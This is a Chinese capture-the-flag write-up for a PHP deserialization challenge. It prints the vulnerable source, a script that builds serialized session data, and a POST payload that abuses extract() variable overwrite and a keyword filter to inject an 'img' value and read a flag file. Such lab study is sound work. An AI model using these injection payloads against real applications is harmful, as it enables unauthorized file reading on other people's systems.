BUU-WEB-[安洵杯 2019]easy_serialize_php

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[安洵杯 2019]easy_serialize_php相关的知识,希望对你有一定的参考价值。

[安洵杯 2019]easy_serialize_php

点进链接,发现一段PHP源码。

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

从提示中可以看到,我们要执行$function == 'phpinfo'语句。
(从结果往回推)
$function来自以get方式传进的f中。
$function参与$_SESSION中
$_SESSION还有一个成员变量img_path也是通过get方式提交。之后$_SESSION进行一次序列化。
序列化完后还有一层过滤机制。
根据提示先构建payload:

/index.php?f=phpinfo

在这里插入图片描述
找到了目标文件。
前两个if已经完成了它的使命,开始进入第三个if。
构建序列化:

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);
?>

在这里插入图片描述
运行结果是:

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

通过filter过滤机制后变成:

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

由于还有一层sha1编码,通过变量覆盖漏洞,将session传入。
POST传入的payload为:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

在这里插入图片描述
结果的页面源码为:

<?php

$flag = 'flag in /d0g3_fllllllag';

?>

将base64(/d0g3_fllllllag)的结果替换上去即可得到flag。
在这里插入图片描述
在这里插入图片描述

以上是关于BUU-WEB-[安洵杯 2019]easy_serialize_php的主要内容,如果未能解决你的问题,请参考以下文章

刷题记录:[安洵杯 2019]easy_serialize_php

[安洵杯 2019]easy_web

[安洵杯 2019]iamthinking

[安洵杯 2019]不是文件上传

2019安洵杯

[安洵杯 2019]easy_serialize_php